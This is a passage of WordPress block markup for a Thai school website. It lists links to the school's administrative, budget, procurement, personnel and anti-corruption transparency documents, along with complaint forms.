:\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=drive_link\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"l